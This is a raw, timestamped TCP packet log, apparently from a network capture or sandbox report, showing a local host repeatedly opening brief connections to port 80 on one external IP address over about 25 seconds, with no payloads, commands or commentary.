                                                                                                                              Nov 20, 2024 10:57:22.115215063 CET4975180192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:22.120414019 CET804975194.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:22.120510101 CET4975180192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:22.123733044 CET4975180192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:22.128839016 CET804975194.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:22.128961086 CET4975180192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:22.134320974 CET804975194.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:22.899676085 CET804975194.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:22.899692059 CET804975194.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:22.899768114 CET4975180192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:22.899801970 CET4975180192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:22.904757977 CET804975194.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:23.032692909 CET4975280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:23.040549994 CET804975294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:23.040623903 CET4975280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:23.042582989 CET4975280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:23.051320076 CET804975294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:23.051374912 CET4975280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:23.059155941 CET804975294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:23.803018093 CET804975294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:23.803056955 CET804975294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:23.803116083 CET4975280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:23.808026075 CET804975294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:23.940078974 CET4975380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:23.945017099 CET804975394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:23.945107937 CET4975380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:23.947213888 CET4975380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:23.952049017 CET804975394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:23.952105999 CET4975380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:23.956950903 CET804975394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:24.685511112 CET804975394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:24.685583115 CET804975394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:24.685646057 CET4975380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:24.685646057 CET4975380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:24.690524101 CET804975394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:24.838731050 CET4975480192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:24.843772888 CET804975494.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:24.844492912 CET4975480192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:24.846554041 CET4975480192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:24.853676081 CET804975494.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:24.855712891 CET4975480192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:24.863075018 CET804975494.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:25.787076950 CET804975494.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:25.787244081 CET4975480192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:25.787420034 CET804975494.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:25.788400888 CET4975480192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:25.795228004 CET804975494.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:25.921185017 CET4975580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:25.926075935 CET804975594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:25.926161051 CET4975580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:25.927906036 CET4975580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:25.934050083 CET804975594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:25.934108973 CET4975580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:25.942075014 CET804975594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:26.822717905 CET804975594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:26.822738886 CET804975594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:26.822818041 CET4975580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:26.822859049 CET4975580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:26.827905893 CET804975594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:26.971038103 CET4975680192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:26.976089954 CET804975694.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:26.976186991 CET4975680192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:26.978172064 CET4975680192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:26.983093023 CET804975694.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:26.983155966 CET4975680192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:26.988032103 CET804975694.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:27.739604950 CET804975694.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:27.739618063 CET804975694.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:27.739804983 CET4975680192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:27.739804983 CET4975680192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:27.744857073 CET804975694.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:27.875098944 CET4975780192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:27.883167028 CET804975794.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:27.883244991 CET4975780192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:27.885332108 CET4975780192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:27.893076897 CET804975794.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:27.893409014 CET4975780192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:27.901120901 CET804975794.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:28.632070065 CET804975794.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:28.632111073 CET804975794.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:28.632252932 CET4975780192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:28.637502909 CET4975780192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:28.642339945 CET804975794.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:28.786712885 CET4975880192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:28.791872025 CET804975894.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:28.791977882 CET4975880192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:28.793894053 CET4975880192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:28.799272060 CET804975894.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:28.799350023 CET4975880192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:28.804357052 CET804975894.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:29.544524908 CET804975894.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:29.544604063 CET804975894.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:29.544680119 CET4975880192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:29.544680119 CET4975880192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:29.549556017 CET804975894.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:29.707357883 CET4975980192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:29.715826988 CET804975994.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:29.715926886 CET4975980192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:29.717889071 CET4975980192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:29.726250887 CET804975994.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:29.726325989 CET4975980192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:29.732372999 CET804975994.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:30.509517908 CET804975994.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:30.509587049 CET804975994.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:30.509633064 CET4975980192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:30.509871006 CET4975980192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:30.514533043 CET804975994.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:30.654500008 CET4976080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:30.659513950 CET804976094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:30.659600973 CET4976080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:30.662184954 CET4976080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:30.667040110 CET804976094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:30.667112112 CET4976080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:30.671946049 CET804976094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:31.416517019 CET804976094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:31.416615009 CET804976094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:31.416743040 CET4976080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:31.420471907 CET4976080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:31.425323963 CET804976094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:31.585381031 CET4976180192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:31.590339899 CET804976194.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:31.590466976 CET4976180192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:31.592397928 CET4976180192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:31.597261906 CET804976194.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:31.597321033 CET4976180192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:31.602236986 CET804976194.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:32.379905939 CET804976194.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:32.379993916 CET4976180192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:32.381134987 CET804976194.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:32.381161928 CET804976194.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:32.381184101 CET4976180192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:32.381206989 CET4976180192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:32.385509968 CET804976194.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:32.519068003 CET4976280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:32.527338028 CET804976294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:32.527430058 CET4976280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:32.529407024 CET4976280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:32.534658909 CET804976294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:32.534728050 CET4976280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:32.540008068 CET804976294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:33.635812044 CET804976294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:33.635824919 CET804976294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:33.635833025 CET804976294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:33.635906935 CET4976280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:33.636023045 CET4976280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:33.639395952 CET804976294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:33.639463902 CET4976280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:33.640881062 CET804976294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:33.787791014 CET4976380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:33.793432951 CET804976394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:33.793550014 CET4976380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:33.795550108 CET4976380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:33.800527096 CET804976394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:33.800604105 CET4976380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:33.805556059 CET804976394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:34.562134981 CET804976394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:34.562150002 CET804976394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:34.562494040 CET4976380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:34.562494040 CET4976380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:34.567580938 CET804976394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:34.707010984 CET5848980192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:34.713445902 CET805848994.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:34.713679075 CET5848980192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:34.715595007 CET5848980192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:34.722129107 CET805848994.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:34.722223997 CET5848980192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:34.727415085 CET805848994.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:35.466188908 CET805848994.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:35.466202021 CET805848994.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:35.466504097 CET5848980192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:35.466504097 CET5848980192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:35.471497059 CET805848994.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:35.617747068 CET5849180192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:35.623383999 CET805849194.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:35.623470068 CET5849180192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:35.625449896 CET5849180192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:35.630410910 CET805849194.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:35.630460024 CET5849180192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:35.635941029 CET805849194.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:36.395639896 CET805849194.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:36.395772934 CET805849194.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:36.395872116 CET5849180192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:36.395872116 CET5849180192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:36.400811911 CET805849194.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:36.534261942 CET5849280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:36.539140940 CET805849294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:36.539235115 CET5849280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:36.541212082 CET5849280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:36.546017885 CET805849294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:36.546091080 CET5849280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:36.550977945 CET805849294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:37.284640074 CET805849294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:37.284733057 CET805849294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:37.284751892 CET5849280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:37.284840107 CET5849280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:37.289800882 CET805849294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:37.533194065 CET5849380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:37.538299084 CET805849394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:37.538398981 CET5849380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:37.553431988 CET5849380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:37.558290958 CET805849394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:37.558372021 CET5849380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:37.563385963 CET805849394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:38.277973890 CET805849394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:38.277988911 CET805849394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:38.278254032 CET5849380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:38.278254032 CET5849380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:38.284188032 CET805849394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:38.428303957 CET5849580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:38.434974909 CET805849594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:38.435165882 CET5849580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:38.437248945 CET5849580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:38.444068909 CET805849594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:38.444139957 CET5849580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:38.450828075 CET805849594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:39.182497978 CET805849594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:39.182621002 CET5849580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:39.182770967 CET805849594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:39.182828903 CET5849580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:39.187671900 CET805849594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:39.329109907 CET5849780192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:39.337373972 CET805849794.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:39.337472916 CET5849780192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:39.339431047 CET5849780192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:39.348617077 CET805849794.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:39.350219011 CET5849780192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:39.355340958 CET805849794.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:40.083363056 CET805849794.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:40.084172010 CET805849794.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:40.084264040 CET5849780192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:40.128667116 CET5849780192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:40.133544922 CET805849794.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:40.374346018 CET5849880192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:40.379442930 CET805849894.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:40.380599976 CET5849880192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:40.383876085 CET5849880192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:40.389372110 CET805849894.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:40.390681982 CET5849880192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:40.397022009 CET805849894.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:41.132220984 CET805849894.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:41.132249117 CET805849894.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:41.132329941 CET5849880192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:41.134746075 CET5849880192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:41.142695904 CET805849894.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:41.267462969 CET5849980192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:41.273792982 CET805849994.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:41.273881912 CET5849980192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:41.275645971 CET5849980192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:41.280767918 CET805849994.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:41.280822039 CET5849980192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:41.288552046 CET805849994.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:42.026184082 CET805849994.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:42.026335955 CET805849994.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:42.026338100 CET5849980192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:42.026418924 CET5849980192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:42.033745050 CET805849994.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:42.181690931 CET5850080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:42.187048912 CET805850094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:42.187161922 CET5850080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:42.189214945 CET5850080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:42.194422960 CET805850094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:42.194530010 CET5850080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:42.199846029 CET805850094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:42.950089931 CET805850094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:42.950118065 CET805850094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:42.950176001 CET5850080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:42.950223923 CET5850080192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:42.955101967 CET805850094.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:43.096318007 CET5850180192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:43.102113962 CET805850194.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:43.102298975 CET5850180192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:43.104093075 CET5850180192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:43.108985901 CET805850194.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:43.109049082 CET5850180192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:43.114608049 CET805850194.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:43.869158030 CET805850194.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:43.869194984 CET805850194.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:43.869492054 CET5850180192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:43.872795105 CET5850180192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:43.877805948 CET805850194.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:44.018203974 CET5850280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:44.026628971 CET805850294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:44.026712894 CET5850280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:44.028678894 CET5850280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:44.036613941 CET805850294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:44.036670923 CET5850280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:44.044529915 CET805850294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:44.776602983 CET805850294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:44.776621103 CET805850294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:44.776690006 CET5850280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:44.776690006 CET5850280192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:44.784399033 CET805850294.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:44.934911013 CET5850380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:44.943589926 CET805850394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:44.943703890 CET5850380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:44.945676088 CET5850380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:44.953075886 CET805850394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:44.953135967 CET5850380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:44.958188057 CET805850394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:45.698539972 CET805850394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:45.698574066 CET805850394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:45.698674917 CET5850380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:45.698674917 CET5850380192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:45.703555107 CET805850394.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:45.846885920 CET5850480192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:45.854825020 CET805850494.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:45.854940891 CET5850480192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:45.856882095 CET5850480192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:45.861743927 CET805850494.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:45.861829042 CET5850480192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:45.866676092 CET805850494.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:46.613703012 CET805850494.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:46.613807917 CET5850480192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:46.613832951 CET805850494.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:46.613883972 CET5850480192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:46.618695021 CET805850494.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:46.755562067 CET5850580192.168.2.494.156.177.41
                                                                                                                              Nov 20, 2024 10:57:46.764810085 CET805850594.156.177.41192.168.2.4
                                                                                                                              Nov 20, 2024 10:57:46.764916897 CET5850580192.168.2.494.156.177.41
